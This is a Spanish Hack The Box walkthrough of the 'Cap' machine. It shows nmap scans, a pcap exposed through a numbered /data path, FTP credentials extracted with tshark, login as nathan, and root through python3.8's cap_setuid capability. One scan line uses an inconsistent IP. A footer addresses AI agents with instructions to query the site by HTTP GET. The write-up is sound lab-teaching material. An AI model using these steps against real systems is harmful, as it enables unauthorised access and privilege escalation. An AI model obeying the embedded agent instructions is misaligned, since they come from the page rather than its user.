# Cap ### 🔍 RECONOCIMIENTO En primer lugar, tras conectarnos a la máquina, utilizamos el comando: ```bash ping -c 1 10.10.10.245 ``` para verificar la conectividad de red.

A continuación, realizamos el comando: ```bash nmap -sC -sV 10.10.10.245 ``` para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el **puerto 21** perteneciente al **servicio FTP** el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más. ### 🔎 EXPLORACIÓN Se utiliza el comando: ```bash sudo nmap -sCV -p22,80 -v 10.10.11.11 ``` para que nos proporcione más información sobre esos puertos específicamente. Entramos a la página web para ver que contiene.

### 🚀 **EXPLOTACIÓN** Si modificamos y ponemos `/data/0` cambian los números y si modificamos con otros números se aplica un **Open Redirect**.

Nos lo descargamos y vemos que son paquetes de Wireshark por lo que los analizamos. ```bash tshark -r 0.pcap ```

Filtramos para ver mejor la información relevante de la captura. ```bash tshark -r 0.pcap -Y "ftp" 2>/dev/null ```

Nos salen unas credenciales por lo que nos logueamos. Descargamos los archivos que contiene. ``` ftp nathan@10.10.10.245 get user.txt ```

Iniciamos sesión con el usuario **nathan**. ```bash ssh nathan@10.10.10.245 ```

### 🔐 **PRIVILEGIOS** Al estar dentro y ejecutar: ```bash whoami ``` aún no somos **root**, por lo que hacemos: ```bash sudo -l ``` para ver si hay algo para explotar pero nos pide contraseña. Tampoco tenemos permisos SUID. Pensamos que si la máquina se llama Cap tiene algo que ver con **capabilities** por lo que miramos. ```bash getcap -r / 2>/dev/null ```

Muestra que **/usr/bin/python3.8** tiene las capacidades **cap\_setuid** y **cap\_net\_bind\_service**, lo cual no es el valor predeterminado. **CAP\_SETUID** permite cambiar a UID 0 (root) sin necesidad del bit SUID. Ejecutamos. ```bash python3.8 import os os.setuid(0) os.system("/bin/bash") ``` Ya somos **root**.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/cap.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.